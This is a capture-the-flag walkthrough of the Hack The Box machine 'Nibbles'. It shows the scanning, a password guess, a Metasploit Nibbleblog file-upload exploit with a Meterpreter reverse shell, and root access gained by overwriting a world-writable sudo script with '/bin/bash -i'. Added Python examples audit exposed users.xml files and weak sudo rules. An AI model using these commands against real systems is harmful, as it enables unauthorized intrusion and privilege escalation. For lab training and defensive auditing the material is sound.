We start our exploration by scanning the target:
nmap -sV -sC -p- "10.10.10.75" -oA nmap_scan
We got the following output:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 18:11 CEST
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.67 seconds
Since there is an HTTP server running on port 80, let's navigate to http://10.10.10.75/. There is not a lot to see here, so let's inspect the source code by hitting Ctrl + U.
At the bottom, we can see the following:
<!-- /nibbleblog/ directory. Nothing interesting here! -->
This seems to be an interesting page to navigate to, so let's see if it exists.
In the bottom-right corner we can see Powered by Nibbleblog, and by searching the web we can find the Nibbleblog CMS.
From here, we can look at the different links on the page, but nothing seems to be interesting. We can try to enumerate subdirectories, or look into the CMS source to understand how its folders and files are structured.
gobuster dir -w /usr/share/wfuzz/general/common.txt -u http://$TARGET/nibbleblog/
This gives the following output:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wfuzz/general/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
Progress: 951 / 952 (99.89%)
===============================================================
Finished
===============================================================
By navigating to /content/, we find the /private/ folder, and inside we discover the following user.xml file:
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
</users>
So now we know that the admin user logs in with the username admin.
By looking at the CMS files and folders, we can see that there should be an /admin.php page, which could be the login page for the administration panel.
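The user.xml file above is exactly the kind of state file that should never be reachable from the web. As an added example (not part of the original write-up), here is a small parser for that Nibbleblog structure that shows what the file discloses: account names, failed-login counters and the blacklist used by the anti-bruteforce mechanism. The sample document is a constructed copy of the contents shown above.

```python
# Added example: parse the Nibbleblog users.xml structure and summarise it.
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

# Constructed copy of the user.xml contents found under /content/private/ above.
SAMPLE_USERS_XML = """<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
</users>"""

def _typed(el):
    """Convert element text according to its Nibbleblog 'type' attribute."""
    text = (el.text or "").strip()
    return int(text) if el.get("type") == "integer" else text

def _iso(ts):
    """Render a Unix timestamp as a UTC date string."""
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

def parse_users_xml(xml_text):
    """Return {'users': [...], 'blacklist': [...]} from a users.xml document."""
    root = ET.fromstring(xml_text)
    users, blacklist = [], []
    for u in root.findall("user"):
        f = {child.tag: _typed(child) for child in u}
        users.append({
            "username": u.get("username"),
            "fail_count": f.get("session_fail_count", 0),
            "last_session": _iso(f["session_date"]) if "session_date" in f else None,
        })
    for b in root.findall("blacklist"):
        f = {child.tag: _typed(child) for child in b}
        blacklist.append({
            "ip": b.get("ip"),
            "fail_count": f.get("fail_count", 0),
            "since": _iso(f["date"]) if "date" in f else None,
        })
    return {"users": users, "blacklist": blacklist}

if __name__ == "__main__":
    summary = parse_users_xml(SAMPLE_USERS_XML)
    print("accounts disclosed:", [u["username"] for u in summary["users"]])
    print("blacklisted IPs:", [b["ip"] for b in summary["blacklist"]])
```

On a real deployment the fix is to deny web access to content/private/ (for example with an Apache directive or by moving the directory out of the document root), not to rely on the file's contents being uninteresting.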
This page is indeed there, and we can see a login form that we can use with the admin username we found earlier. Since we don't have the password, we could try a dictionary attack with Hydra, but it seems that a blacklisting mechanism is in place to prevent this kind of attack.
Since it is an easy box on Hack The Box, let's simply try the name of the box as the password: nibbles (not guessing here, just a habit from Hack The Box).
It worked! While in, let's check which version of Nibbleblog is running. We can do this by going to the Settings page and scrolling down to reveal Nibbleblog 4.0.3 "Coffee" - Developed by Diego Najar.
With this information, let's search for any known exploit:
searchsploit "nibbleblog 4.0.3"
This displays the following output:
-------------------------------------------------------- ---------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
-------------------------------------------------------- ---------------------
Let's run Metasploit:
msfconsole -q
In the msfconsole, we can run the following commands:
search nibbleblog
use exploit/multi/http/nibbleblog_file_upload
show options
set PASSWORD "nibbles"
set RHOSTS "10.10.10.75"
set TARGETURI "/nibbleblog"
set USERNAME "admin"
check
run
I used a Meterpreter payload for this one configured with my IP (VPN) and a listening port for the reverse TCP connection.
When we receive the reverse shell, we can directly try to identify who we are running our commands as:
getuid
This outputs: Server username: nibbler
Let's list the contents of that user's home directory:
ls /home/nibbler
Here is the command output:
Listing: /home/nibbler
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 0 fil 2017-12-29 11:29:56 +0100 .bash_history
040775/rwxrwxr-x 4096 dir 2017-12-11 04:04:04 +0100 .nano
100400/r-------- 1855 fil 2017-12-11 04:07:21 +0100 personal.zip
100400/r-------- 33 fil 2024-09-21 13:32:33 +0200 user.txt
And here we have our user flag. Now let’s look for privilege escalation.
I’ll first start by getting the LinPEAS script on my machine (in another terminal):
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
And in Meterpreter:
upload linpeas.sh /tmp/linpeas.sh
shell
bash /tmp/linpeas.sh
Among the results, we can see the following output:
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
This seems very interesting. In nibbler's home directory we don't have the personal folder, but we do have a Zip file, personal.zip. Let's unpack it:
unzip personal.zip
We can now check the permissions we have on this file:
ls -al ~/personal/stuff
This gives us the following output:
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
This file has 777 permissions, which means read, write and execute for everyone, and we already know that we can execute it as root without a password. Let's simply modify it:
echo "/bin/bash -i" > ~/personal/stuff/monitor.sh
And finally, we run it:
sudo ~/personal/stuff/monitor.sh
We are now root on the machine and can grab the root flag in /root/root.txt.
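The root cause of the privilege escalation above is a sudo rule whose target lives in a directory the invoking user controls, with the script itself world-writable. As an added example (not part of the original write-up), here is an audit routine that reads sudo -l style output and flags any rule whose command, or any directory above it, is owned by a non-root user or writable by group/world; the stat data is constructed so it runs offline, and the backup.sh rule is an invented, correctly deployed counterpart for contrast.

```python
# Added example: flag sudo rules whose target can be modified by a non-root user.
import os
import re
import stat

# Matches rule lines in "sudo -l" output, e.g. "(root) NOPASSWD: /path/to/cmd"
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")

# Constructed sample: the rule found on the box plus a hypothetical safe one.
SAMPLE_SUDO_L = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /usr/local/bin/backup.sh
"""
# Constructed stat data as (st_mode, st_uid); uid 1000 stands in for nibbler.
SAMPLE_STATS = {
    "/home/nibbler/personal/stuff/monitor.sh": (0o100777, 1000),
    "/home/nibbler/personal/stuff": (0o40755, 1000),
    "/usr/local/bin/backup.sh": (0o100755, 0),
    "/usr/local/bin": (0o40755, 0),
}

def parse_sudo_rules(sudo_l_output):
    """Return [(runas, nopasswd, command)] for every rule line in sudo -l output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = _RULE_RE.match(line)
        if m:
            rules.append((m.group("runas"), "NOPASSWD:" in m.group("tags"), m.group("cmd")))
    return rules

def modifiable_by_non_root(mode, uid):
    """A non-root owner, or group/world write bits, means the path can be replaced."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def live_stat(path):
    """stat_lookup for a real filesystem: (mode, uid), or None if the path is missing."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (st.st_mode, st.st_uid)

def audit_sudo_rules(sudo_l_output, stat_lookup=live_stat):
    """Return (command, runas, nopasswd, weak_path) for each rule with a modifiable target."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(sudo_l_output):
        path = cmd
        while path.startswith("/") and path != "/":  # walk from the file up to /
            info = stat_lookup(path)
            if info and modifiable_by_non_root(*info):
                findings.append((cmd, runas, nopasswd, path))
                break
            path = os.path.dirname(path)
    return findings
```

Running audit_sudo_rules with the default live_stat against real sudo -l output performs the same check on a host; the remediation is to keep sudo targets root-owned under a root-owned path (for example /usr/local/sbin) with mode 0755 at most.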